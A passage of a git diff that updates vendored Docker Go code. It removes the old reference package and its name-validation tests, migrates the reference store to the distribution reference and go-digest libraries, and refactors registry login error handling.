nil Reference. -func ParseNamed(s string) (Named, error) { - named, err := distreference.ParseNamed(s) - if err != nil { - return nil, fmt.Errorf("Error parsing reference: %q is not a valid repository/tag: %s", s, err) - } - r, err := WithName(named.Name()) - if err != nil { - return nil, err - } - if canonical, isCanonical := named.(distreference.Canonical); isCanonical { - return WithDigest(r, canonical.Digest()) - } - if tagged, isTagged := named.(distreference.NamedTagged); isTagged { - return WithTag(r, tagged.Tag()) - } - return r, nil -} - -// TrimNamed removes any tag or digest from the named reference -func TrimNamed(ref Named) Named { - return &namedRef{distreference.TrimNamed(ref)} -} - -// WithName returns a named object representing the given string. If the input -// is invalid ErrReferenceInvalidFormat will be returned. -func WithName(name string) (Named, error) { - name, err := normalize(name) - if err != nil { - return nil, err - } - if err := validateName(name); err != nil { - return nil, err - } - r, err := distreference.WithName(name) - if err != nil { - return nil, err - } - return &namedRef{r}, nil -} - -// WithTag combines the name from "name" and the tag from "tag" to form a -// reference incorporating both the name and the tag. -func WithTag(name Named, tag string) (NamedTagged, error) { - r, err := distreference.WithTag(name, tag) - if err != nil { - return nil, err - } - return &taggedRef{namedRef{r}}, nil -} - -// WithDigest combines the name from "name" and the digest from "digest" to form -// a reference incorporating both the name and the digest. -func WithDigest(name Named, digest digest.Digest) (Canonical, error) { - r, err := distreference.WithDigest(name, digest) - if err != nil { - return nil, err - } - return &canonicalRef{namedRef{r}}, nil -} - -type namedRef struct { - distreference.Named -} -type taggedRef struct { - namedRef -} -type canonicalRef struct { - namedRef -} - -func (r *namedRef) FullName() string { - hostname, remoteName := splitHostname(r.Name()) - return hostname + "/" + remoteName -} -func (r *namedRef) Hostname() string { - hostname, _ := splitHostname(r.Name()) - return hostname -} -func (r *namedRef) RemoteName() string { - _, remoteName := splitHostname(r.Name()) - return remoteName -} -func (r *taggedRef) Tag() string { - return r.namedRef.Named.(distreference.NamedTagged).Tag() -} -func (r *canonicalRef) Digest() digest.Digest { - return r.namedRef.Named.(distreference.Canonical).Digest() -} - -// WithDefaultTag adds a default tag to a reference if it only has a repo name. -func WithDefaultTag(ref Named) Named { - if IsNameOnly(ref) { - ref, _ = WithTag(ref, DefaultTag) - } - return ref -} - -// IsNameOnly returns true if reference only contains a repo name. -func IsNameOnly(ref Named) bool { - if _, ok := ref.(NamedTagged); ok { - return false - } - if _, ok := ref.(Canonical); ok { - return false - } - return true -} - -// ParseIDOrReference parses string for an image ID or a reference. ID can be -// without a default prefix. -func ParseIDOrReference(idOrRef string) (digest.Digest, Named, error) { - if err := v1.ValidateID(idOrRef); err == nil { - idOrRef = "sha256:" + idOrRef - } - if dgst, err := digest.ParseDigest(idOrRef); err == nil { - return dgst, nil, nil - } - ref, err := ParseNamed(idOrRef) - return "", ref, err -} - -// splitHostname splits a repository name to hostname and remotename string. -// If no valid hostname is found, the default hostname is used. Repository name -// needs to be already validated before. -func splitHostname(name string) (hostname, remoteName string) { - i := strings.IndexRune(name, '/') - if i == -1 || (!strings.ContainsAny(name[:i], ".:") && name[:i] != "localhost") { - hostname, remoteName = DefaultHostname, name - } else { - hostname, remoteName = name[:i], name[i+1:] - } - if hostname == LegacyDefaultHostname { - hostname = DefaultHostname - } - if hostname == DefaultHostname && !strings.ContainsRune(remoteName, '/') { - remoteName = DefaultRepoPrefix + remoteName - } - return -} - -// normalize returns a repository name in its normalized form, meaning it -// will not contain default hostname nor library/ prefix for official images. -func normalize(name string) (string, error) { - host, remoteName := splitHostname(name) - if strings.ToLower(remoteName) != remoteName { - return "", errors.New("invalid reference format: repository name must be lowercase") - } - if host == DefaultHostname { - if strings.HasPrefix(remoteName, DefaultRepoPrefix) { - return strings.TrimPrefix(remoteName, DefaultRepoPrefix), nil - } - return remoteName, nil - } - return name, nil -} - -func validateName(name string) error { - if err := v1.ValidateID(name); err == nil { - return fmt.Errorf("Invalid repository name (%s), cannot specify 64-byte hexadecimal strings", name) - } - return nil -} diff --git a/vendor/github.com/docker/docker/reference/reference_test.go b/vendor/github.com/docker/docker/reference/reference_test.go deleted file mode 100644 index ff35ba3da2..0000000000 --- a/vendor/github.com/docker/docker/reference/reference_test.go +++ /dev/null @@ -1,275 +0,0 @@ -package reference - -import ( - "testing" - - "github.com/docker/distribution/digest" -) - -func TestValidateReferenceName(t *testing.T) { - validRepoNames := []string{ - "docker/docker", - "library/debian", - "debian", - "docker.io/docker/docker", - "docker.io/library/debian", - "docker.io/debian", - "index.docker.io/docker/docker", - "index.docker.io/library/debian", - "index.docker.io/debian", - "127.0.0.1:5000/docker/docker", - "127.0.0.1:5000/library/debian", - "127.0.0.1:5000/debian", - "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", - } - invalidRepoNames := []string{ - "https://github.com/docker/docker", - "docker/Docker", - "-docker", - "-docker/docker", - "-docker.io/docker/docker", - "docker///docker", - "docker.io/docker/Docker", - "docker.io/docker///docker", - "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", - "docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", - } - - for _, name := range invalidRepoNames { - _, err := ParseNamed(name) - if err == nil { - t.Fatalf("Expected invalid repo name for %q", name) - } - } - - for _, name := range validRepoNames { - _, err := ParseNamed(name) - if err != nil { - t.Fatalf("Error parsing repo name %s, got: %q", name, err) - } - } -} - -func TestValidateRemoteName(t *testing.T) { - validRepositoryNames := []string{ - // Sanity check. - "docker/docker", - - // Allow 64-character non-hexadecimal names (hexadecimal names are forbidden). - "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", - - // Allow embedded hyphens. - "docker-rules/docker", - - // Allow multiple hyphens as well. - "docker---rules/docker", - - //Username doc and image name docker being tested. - "doc/docker", - - // single character names are now allowed. - "d/docker", - "jess/t", - - // Consecutive underscores. - "dock__er/docker", - } - for _, repositoryName := range validRepositoryNames { - _, err := ParseNamed(repositoryName) - if err != nil { - t.Errorf("Repository name should be valid: %v. Error: %v", repositoryName, err) - } - } - - invalidRepositoryNames := []string{ - // Disallow capital letters. - "docker/Docker", - - // Only allow one slash. - "docker///docker", - - // Disallow 64-character hexadecimal. - "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", - - // Disallow leading and trailing hyphens in namespace. - "-docker/docker", - "docker-/docker", - "-docker-/docker", - - // Don't allow underscores everywhere (as opposed to hyphens). - "____/____", - - "_docker/_docker", - - // Disallow consecutive periods. - "dock..er/docker", - "dock_.er/docker", - "dock-.er/docker", - - // No repository. - "docker/", - - //namespace too long - "this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker", - } - for _, repositoryName := range invalidRepositoryNames { - if _, err := ParseNamed(repositoryName); err == nil { - t.Errorf("Repository name should be invalid: %v", repositoryName) - } - } -} - -func TestParseRepositoryInfo(t *testing.T) { - type tcase struct { - RemoteName, NormalizedName, FullName, AmbiguousName, Hostname string - } - - tcases := []tcase{ - { - RemoteName: "fooo/bar", - NormalizedName: "fooo/bar", - FullName: "docker.io/fooo/bar", - AmbiguousName: "index.docker.io/fooo/bar", - Hostname: "docker.io", - }, - { - RemoteName: "library/ubuntu", - NormalizedName: "ubuntu", - FullName: "docker.io/library/ubuntu", - AmbiguousName: "library/ubuntu", - Hostname: "docker.io", - }, - { - RemoteName: "nonlibrary/ubuntu", - NormalizedName: "nonlibrary/ubuntu", - FullName: "docker.io/nonlibrary/ubuntu", - AmbiguousName: "", - Hostname: "docker.io", - }, - { - RemoteName: "other/library", - NormalizedName: "other/library", - FullName: "docker.io/other/library", - AmbiguousName: "", - Hostname: "docker.io", - }, - { - RemoteName: "private/moonbase", - NormalizedName: "127.0.0.1:8000/private/moonbase", - FullName: "127.0.0.1:8000/private/moonbase", - AmbiguousName: "", - Hostname: "127.0.0.1:8000", - }, - { - RemoteName: "privatebase", - NormalizedName: "127.0.0.1:8000/privatebase", - FullName: "127.0.0.1:8000/privatebase", - AmbiguousName: "", - Hostname: "127.0.0.1:8000", - }, - { - RemoteName: "private/moonbase", - NormalizedName: "example.com/private/moonbase", - FullName: "example.com/private/moonbase", - AmbiguousName: "", - Hostname: "example.com", - }, - { - RemoteName: "privatebase", - NormalizedName: "example.com/privatebase", - FullName: "example.com/privatebase", - AmbiguousName: "", - Hostname: "example.com", - }, - { - RemoteName: "private/moonbase", - NormalizedName: "example.com:8000/private/moonbase", - FullName: "example.com:8000/private/moonbase", - AmbiguousName: "", - Hostname: "example.com:8000", - }, - { - RemoteName: "privatebasee", - NormalizedName: "example.com:8000/privatebasee", - FullName: "example.com:8000/privatebasee", - AmbiguousName: "", - Hostname: "example.com:8000", - }, - { - RemoteName: "library/ubuntu-12.04-base", - NormalizedName: "ubuntu-12.04-base", - FullName: "docker.io/library/ubuntu-12.04-base", - AmbiguousName: "index.docker.io/library/ubuntu-12.04-base", - Hostname: "docker.io", - }, - } - - for _, tcase := range tcases { - refStrings := []string{tcase.NormalizedName, tcase.FullName} - if tcase.AmbiguousName != "" { - refStrings = append(refStrings, tcase.AmbiguousName) - } - - var refs []Named - for _, r := range refStrings { - named, err := ParseNamed(r) - if err != nil { - t.Fatal(err) - } - refs = append(refs, named) - named, err = WithName(r) - if err != nil { - t.Fatal(err) - } - refs = append(refs, named) - } - - for _, r := range refs { - if expected, actual := tcase.NormalizedName, r.Name(); expected != actual { - t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) - } - if expected, actual := tcase.FullName, r.FullName(); expected != actual { - t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual) - } - if expected, actual := tcase.Hostname, r.Hostname(); expected != actual { - t.Fatalf("Invalid hostname for %q. Expected %q, got %q", r, expected, actual) - } - if expected, actual := tcase.RemoteName, r.RemoteName(); expected != actual { - t.Fatalf("Invalid remoteName for %q. Expected %q, got %q", r, expected, actual) - } - - } - } -} - -func TestParseReferenceWithTagAndDigest(t *testing.T) { - ref, err := ParseNamed("busybox:latest@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa") - if err != nil { - t.Fatal(err) - } - if _, isTagged := ref.(NamedTagged); isTagged { - t.Fatalf("Reference from %q should not support tag", ref) - } - if _, isCanonical := ref.(Canonical); !isCanonical { - t.Fatalf("Reference from %q should not support digest", ref) - } - if expected, actual := "busybox@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa", ref.String(); actual != expected { - t.Fatalf("Invalid parsed reference for %q: expected %q, got %q", ref, expected, actual) - } -} - -func TestInvalidReferenceComponents(t *testing.T) { - if _, err := WithName("-foo"); err == nil { - t.Fatal("Expected WithName to detect invalid name") - } - ref, err := WithName("busybox") - if err != nil { - t.Fatal(err) - } - if _, err := WithTag(ref, "-foo"); err == nil { - t.Fatal("Expected WithName to detect invalid tag") - } - if _, err := WithDigest(ref, digest.Digest("foo")); err == nil { - t.Fatal("Expected WithName to detect invalid digest") - } -} diff --git a/vendor/github.com/docker/docker/reference/store.go b/vendor/github.com/docker/docker/reference/store.go index 71ca236c9c..b01051bf58 100644 --- a/vendor/github.com/docker/docker/reference/store.go +++ b/vendor/github.com/docker/docker/reference/store.go @@ -1,38 +1,39 @@ -package reference +package reference // import "github.com/docker/docker/reference" import ( "encoding/json" - "errors" "fmt" "os" "path/filepath" "sort" "sync" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" ) var ( // ErrDoesNotExist is returned if a reference is not found in the // store. - ErrDoesNotExist = errors.New("reference does not exist") + ErrDoesNotExist notFoundError = "reference does not exist" ) // An Association is a tuple associating a reference with an image ID. type Association struct { - Ref Named + Ref reference.Named ID digest.Digest } -// Store provides the set of methods which can operate on a tag store. +// Store provides the set of methods which can operate on a reference store. type Store interface { - References(id digest.Digest) []Named - ReferencesByName(ref Named) []Association - AddTag(ref Named, id digest.Digest, force bool) error - AddDigest(ref Canonical, id digest.Digest, force bool) error - Delete(ref Named) (bool, error) - Get(ref Named) (digest.Digest, error) + References(id digest.Digest) []reference.Named + ReferencesByName(ref reference.Named) []Association + AddTag(ref reference.Named, id digest.Digest, force bool) error + AddDigest(ref reference.Canonical, id digest.Digest, force bool) error + Delete(ref reference.Named) (bool, error) + Get(ref reference.Named) (digest.Digest, error) } type store struct { @@ -44,24 +45,28 @@ type store struct { Repositories map[string]repository // referencesByIDCache is a cache of references indexed by ID, to speed // up References. - referencesByIDCache map[digest.Digest]map[string]Named + referencesByIDCache map[digest.Digest]map[string]reference.Named } // Repository maps tags to digests. The key is a stringified Reference, // including the repository name. type repository map[string]digest.Digest -type lexicalRefs []Named +type lexicalRefs []reference.Named -func (a lexicalRefs) Len() int { return len(a) } -func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a lexicalRefs) Less(i, j int) bool { return a[i].String() < a[j].String() } +func (a lexicalRefs) Len() int { return len(a) } +func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalRefs) Less(i, j int) bool { + return a[i].String() < a[j].String() +} type lexicalAssociations []Association -func (a lexicalAssociations) Len() int { return len(a) } -func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] } -func (a lexicalAssociations) Less(i, j int) bool { return a[i].Ref.String() < a[j].Ref.String() } +func (a lexicalAssociations) Len() int { return len(a) } +func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a lexicalAssociations) Less(i, j int) bool { + return a[i].Ref.String() < a[j].Ref.String() +} // NewReferenceStore creates a new reference store, tied to a file path where // the set of references are serialized in JSON format. @@ -74,7 +79,7 @@ func NewReferenceStore(jsonPath string) (Store, error) { store := &store{ jsonPath: abspath, Repositories: make(map[string]repository), - referencesByIDCache: make(map[digest.Digest]map[string]Named), + referencesByIDCache: make(map[digest.Digest]map[string]reference.Named), } // Load the json file if it exists, otherwise create it. if err := store.reload(); os.IsNotExist(err) { @@ -89,43 +94,72 @@ func NewReferenceStore(jsonPath string) (Store, error) { // AddTag adds a tag reference to the store. If force is set to true, existing // references can be overwritten. This only works for tags, not digests. -func (store *store) AddTag(ref Named, id digest.Digest, force bool) error { - if _, isCanonical := ref.(Canonical); isCanonical { - return errors.New("refusing to create a tag with a digest reference") +func (store *store) AddTag(ref reference.Named, id digest.Digest, force bool) error { + if _, isCanonical := ref.(reference.Canonical); isCanonical { + return errors.WithStack(invalidTagError("refusing to create a tag with a digest reference")) } - return store.addReference(WithDefaultTag(ref), id, force) + return store.addReference(reference.TagNameOnly(ref), id, force) } // AddDigest adds a digest reference to the store. -func (store *store) AddDigest(ref Canonical, id digest.Digest, force bool) error { +func (store *store) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { return store.addReference(ref, id, force) } -func (store *store) addReference(ref Named, id digest.Digest, force bool) error { - if ref.Name() == string(digest.Canonical) { - return errors.New("refusing to create an ambiguous tag using digest algorithm as name") +func favorDigest(originalRef reference.Named) (reference.Named, error) { + ref := originalRef + // If the reference includes a digest and a tag, we must store only the + // digest. + canonical, isCanonical := originalRef.(reference.Canonical) + _, isNamedTagged := originalRef.(reference.NamedTagged) + + if isCanonical && isNamedTagged { + trimmed, err := reference.WithDigest(reference.TrimNamed(canonical), canonical.Digest()) + if err != nil { + // should never happen + return originalRef, err + } + ref = trimmed + } + return ref, nil +} + +func (store *store) addReference(ref reference.Named, id digest.Digest, force bool) error { + ref, err := favorDigest(ref) + if err != nil { + return err + } + + refName := reference.FamiliarName(ref) + refStr := reference.FamiliarString(ref) + + if refName == string(digest.Canonical) { + return errors.WithStack(invalidTagError("refusing to create an ambiguous tag using digest algorithm as name")) } store.mu.Lock() defer store.mu.Unlock() - repository, exists := store.Repositories[ref.Name()] + repository, exists := store.Repositories[refName] if !exists || repository == nil { repository = make(map[string]digest.Digest) - store.Repositories[ref.Name()] = repository + store.Repositories[refName] = repository } - refStr := ref.String() oldID, exists := repository[refStr] if exists { // force only works for tags - if digested, isDigest := ref.(Canonical); isDigest { - return fmt.Errorf("Cannot overwrite digest %s", digested.Digest().String()) + if digested, isDigest := ref.(reference.Canonical); isDigest { + return errors.WithStack(conflictingTagError("Cannot overwrite digest " + digested.Digest().String())) } if !force { - return fmt.Errorf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use -f option", ref.String(), oldID.String()) + return errors.WithStack( + conflictingTagError( + fmt.Sprintf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use the force option", refStr, oldID.String()), + ), + ) } if store.referencesByIDCache[oldID] != nil { @@ -138,7 +172,7 @@ func (store *store) addReference(ref Named, id digest.Digest, force bool) error repository[refStr] = id if store.referencesByIDCache[id] == nil { - store.referencesByIDCache[id] = make(map[string]Named) + store.referencesByIDCache[id] = make(map[string]reference.Named) } store.referencesByIDCache[id][refStr] = ref @@ -147,24 +181,29 @@ func (store *store) addReference(ref Named, id digest.Digest, force bool) error // Delete deletes a reference from the store. It returns true if a deletion // happened, or false otherwise. -func (store *store) Delete(ref Named) (bool, error) { - ref = WithDefaultTag(ref) +func (store *store) Delete(ref reference.Named) (bool, error) { + ref, err := favorDigest(ref) + if err != nil { + return false, err + } + + ref = reference.TagNameOnly(ref) + + refName := reference.FamiliarName(ref) + refStr := reference.FamiliarString(ref) store.mu.Lock() defer store.mu.Unlock() - repoName := ref.Name() - - repository, exists := store.Repositories[repoName] + repository, exists := store.Repositories[refName] if !exists { return false, ErrDoesNotExist } - refStr := ref.String() if id, exists := repository[refStr]; exists { delete(repository, refStr) if len(repository) == 0 { - delete(store.Repositories, repoName) + delete(store.Repositories, refName) } if store.referencesByIDCache[id] != nil { delete(store.referencesByIDCache[id], refStr) @@ -179,18 +218,34 @@ func (store *store) Delete(ref Named) (bool, error) { } // Get retrieves an item from the store by reference -func (store *store) Get(ref Named) (digest.Digest, error) { - ref = WithDefaultTag(ref) +func (store *store) Get(ref reference.Named) (digest.Digest, error) { + if canonical, ok := ref.(reference.Canonical); ok { + // If reference contains both tag and digest, only + // lookup by digest as it takes precedence over + // tag, until tag/digest combos are stored. + if _, ok := ref.(reference.Tagged); ok { + var err error + ref, err = reference.WithDigest(reference.TrimNamed(canonical), canonical.Digest()) + if err != nil { + return "", err + } + } + } else { + ref = reference.TagNameOnly(ref) + } + + refName := reference.FamiliarName(ref) + refStr := reference.FamiliarString(ref) store.mu.RLock() defer store.mu.RUnlock() - repository, exists := store.Repositories[ref.Name()] + repository, exists := store.Repositories[refName] if !exists || repository == nil { return "", ErrDoesNotExist } - id, exists := repository[ref.String()] + id, exists := repository[refStr] if !exists { return "", ErrDoesNotExist } @@ -200,7 +255,7 @@ func (store *store) Get(ref Named) (digest.Digest, error) { // References returns a slice of references to the given ID. The slice // will be nil if there are no references to this ID. -func (store *store) References(id digest.Digest) []Named { +func (store *store) References(id digest.Digest) []reference.Named { store.mu.RLock() defer store.mu.RUnlock() @@ -208,7 +263,7 @@ func (store *store) References(id digest.Digest) []Named { // 1) We must not return a mutable // 2) It would be ugly to expose the extraneous map keys to callers. - var references []Named + var references []reference.Named for _, ref := range store.referencesByIDCache[id] { references = append(references, ref) } @@ -221,18 +276,20 @@ func (store *store) References(id digest.Digest) []Named { // ReferencesByName returns the references for a given repository name. // If there are no references known for this repository name, // ReferencesByName returns nil. -func (store *store) ReferencesByName(ref Named) []Association { +func (store *store) ReferencesByName(ref reference.Named) []Association { + refName := reference.FamiliarName(ref) + store.mu.RLock() defer store.mu.RUnlock() - repository, exists := store.Repositories[ref.Name()] + repository, exists := store.Repositories[refName] if !exists { return nil } var associations []Association for refStr, refID := range repository { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { // Should never happen return nil @@ -270,13 +327,13 @@ func (store *store) reload() error { for _, repository := range store.Repositories { for refStr, refID := range repository { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { // Should never happen continue } if store.referencesByIDCache[refID] == nil { - store.referencesByIDCache[refID] = make(map[string]Named) + store.referencesByIDCache[refID] = make(map[string]reference.Named) } store.referencesByIDCache[refID][refStr] = ref } diff --git a/vendor/github.com/docker/docker/reference/store_test.go b/vendor/github.com/docker/docker/reference/store_test.go index dd1d253d8e..1ce674cbfb 100644 --- a/vendor/github.com/docker/docker/reference/store_test.go +++ b/vendor/github.com/docker/docker/reference/store_test.go @@ -1,4 +1,4 @@ -package reference +package reference // import "github.com/docker/docker/reference" import ( "bytes" @@ -8,7 +8,10 @@ import ( "strings" "testing" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -45,7 +48,7 @@ func TestLoad(t *testing.T) { } for refStr, expectedID := range saveLoadTestCases { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { t.Fatalf("failed to parse reference: %v", err) } @@ -61,10 +64,10 @@ func TestLoad(t *testing.T) { func TestSave(t *testing.T) { jsonFile, err := ioutil.TempFile("", "tag-store-test") - if err != nil { - t.Fatalf("error creating temp file: %v", err) - } + assert.NilError(t, err) + _, err = jsonFile.Write([]byte(`{}`)) + assert.NilError(t, err) jsonFile.Close() defer os.RemoveAll(jsonFile.Name()) @@ -74,11 +77,11 @@ func TestSave(t *testing.T) { } for refStr, id := range saveLoadTestCases { - ref, err := ParseNamed(refStr) + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { t.Fatalf("failed to parse reference: %v", err) } - if canonical, ok := ref.(Canonical); ok { + if canonical, ok := ref.(reference.Canonical); ok { err = store.AddDigest(canonical, id, false) if err != nil { t.Fatalf("could not add digest reference %s: %v", refStr, err) @@ -120,7 +123,7 @@ func TestAddDeleteGet(t *testing.T) { testImageID3 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9e") // Try adding a reference with no tag or digest - nameOnly, err := WithName("username/repo") + nameOnly, err := reference.ParseNormalizedNamed("username/repo") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -129,7 +132,7 @@ func TestAddDeleteGet(t *testing.T) { } // Add a few references - ref1, err := ParseNamed("username/repo1:latest") + ref1, err := reference.ParseNormalizedNamed("username/repo1:latest") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -137,7 +140,7 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref2, err := ParseNamed("username/repo1:old") + ref2, err := reference.ParseNormalizedNamed("username/repo1:old") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -145,7 +148,7 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref3, err := ParseNamed("username/repo1:alias") + ref3, err := reference.ParseNormalizedNamed("username/repo1:alias") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -153,7 +156,7 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref4, err := ParseNamed("username/repo2:latest") + ref4, err := reference.ParseNormalizedNamed("username/repo2:latest") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -161,11 +164,11 @@ func TestAddDeleteGet(t *testing.T) { t.Fatalf("error adding to store: %v", err) } - ref5, err := ParseNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c") + ref5, err := reference.ParseNormalizedNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c") if err != nil { t.Fatalf("could not parse reference: %v", err) } - if err = store.AddDigest(ref5.(Canonical), testImageID2, false); err != nil { + if err = store.AddDigest(ref5.(reference.Canonical), testImageID2, false); err != nil { t.Fatalf("error adding to store: %v", err) } @@ -228,7 +231,7 @@ func TestAddDeleteGet(t *testing.T) { } // Get should return ErrDoesNotExist for a nonexistent repo - nonExistRepo, err := ParseNamed("username/nonexistrepo:latest") + nonExistRepo, err := reference.ParseNormalizedNamed("username/nonexistrepo:latest") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -237,7 +240,7 @@ func TestAddDeleteGet(t *testing.T) { } // Get should return ErrDoesNotExist for a nonexistent tag - nonExistTag, err := ParseNamed("username/repo1:nonexist") + nonExistTag, err := reference.ParseNormalizedNamed("username/repo1:nonexist") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -263,7 +266,7 @@ func TestAddDeleteGet(t *testing.T) { } // Check ReferencesByName - repoName, err := WithName("username/repo1") + repoName, err := reference.ParseNormalizedNamed("username/repo1") if err != nil { t.Fatalf("could not parse reference: %v", err) } @@ -303,19 +306,19 @@ func TestAddDeleteGet(t *testing.T) { } // Delete a few references - if deleted, err := store.Delete(ref1); err != nil || deleted != true { + if deleted, err := store.Delete(ref1); err != nil || !deleted { t.Fatal("Delete failed") } if _, err := store.Get(ref1); err != ErrDoesNotExist { t.Fatal("Expected ErrDoesNotExist from Get") } - if deleted, err := store.Delete(ref5); err != nil || deleted != true { + if deleted, err := store.Delete(ref5); err != nil || !deleted { t.Fatal("Delete failed") } if _, err := store.Get(ref5); err != ErrDoesNotExist { t.Fatal("Expected ErrDoesNotExist from Get") } - if deleted, err := store.Delete(nameOnly); err != nil || deleted != true { + if deleted, err := store.Delete(nameOnly); err != nil || !deleted { t.Fatal("Delete failed") } if _, err := store.Get(nameOnly); err != ErrDoesNotExist { @@ -325,32 +328,23 @@ func TestAddDeleteGet(t *testing.T) { func TestInvalidTags(t *testing.T) { tmpDir, err := ioutil.TempDir("", "tag-store-test") + assert.NilError(t, err) defer os.RemoveAll(tmpDir) store, err := NewReferenceStore(filepath.Join(tmpDir, "repositories.json")) - if err != nil { - t.Fatalf("error creating tag store: %v", err) - } + assert.NilError(t, err) id := digest.Digest("sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6") // sha256 as repo name - ref, err := ParseNamed("sha256:abc") - if err != nil { - t.Fatal(err) - } + ref, err := reference.ParseNormalizedNamed("sha256:abc") + assert.NilError(t, err) err = store.AddTag(ref, id, true) - if err == nil { - t.Fatalf("expected setting tag %q to fail", ref) - } + assert.Check(t, is.ErrorContains(err, "")) // setting digest as a tag - ref, err = ParseNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6") - if err != nil { - t.Fatal(err) - } - err = store.AddTag(ref, id, true) - if err == nil { - t.Fatalf("expected setting digest %q to fail", ref) - } + ref, err = reference.ParseNormalizedNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6") + assert.NilError(t, err) + err = store.AddTag(ref, id, true) + assert.Check(t, is.ErrorContains(err, "")) } diff --git a/vendor/github.com/docker/docker/registry/auth.go b/vendor/github.com/docker/docker/registry/auth.go index 8cadd51ba0..1f2043a0d9 100644 --- a/vendor/github.com/docker/docker/registry/auth.go +++ b/vendor/github.com/docker/docker/registry/auth.go @@ -1,19 +1,20 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( - "fmt" "io/ioutil" "net/http" "net/url" "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/registry/client/auth" "github.com/docker/distribution/registry/client/auth/challenge" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const ( @@ -23,21 +24,15 @@ const ( // loginV1 tries to register/login to the v1 registry server. func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent string) (string, string, error) { - registryEndpoint, err := apiEndpoint.ToV1Endpoint(userAgent, nil) - if err != nil { - return "", "", err - } - + registryEndpoint := apiEndpoint.ToV1Endpoint(userAgent, nil) serverAddress := registryEndpoint.String() logrus.Debugf("attempting v1 login to registry endpoint %s", serverAddress) if serverAddress == "" { - return "", "", fmt.Errorf("Server Error: Server Address not set.") + return "", "", errdefs.System(errors.New("server Error: Server Address not set")) } - loginAgainstOfficialIndex := serverAddress == IndexServer - req, err := http.NewRequest("GET", serverAddress+"users/", nil) if err != nil { return "", "", err @@ -53,27 +48,23 @@ func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent st defer resp.Body.Close() body, err := ioutil.ReadAll(resp.Body) if err != nil { - return "", "", err + return "", "", errdefs.System(err) } - if resp.StatusCode == http.StatusOK { + + switch resp.StatusCode { + case http.StatusOK: return "Login Succeeded", "", nil - } else if resp.StatusCode == http.StatusUnauthorized { - if loginAgainstOfficialIndex { - return "", "", fmt.Errorf("Wrong login/password, please try again. Haven't got a Docker ID? Create one at https://hub.docker.com") - } - return "", "", fmt.Errorf("Wrong login/password, please try again") - } else if resp.StatusCode == http.StatusForbidden { - if loginAgainstOfficialIndex { - return "", "", fmt.Errorf("Login: Account is not active. Please check your e-mail for a confirmation link.") - } + case http.StatusUnauthorized: + return "", "", errdefs.Unauthorized(errors.New("Wrong login/password, please try again")) + case http.StatusForbidden: // *TODO: Use registry configuration to determine what this says, if anything? - return "", "", fmt.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress) - } else if resp.StatusCode == http.StatusInternalServerError { // Issue #14326 + return "", "", errdefs.Forbidden(errors.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress)) + case 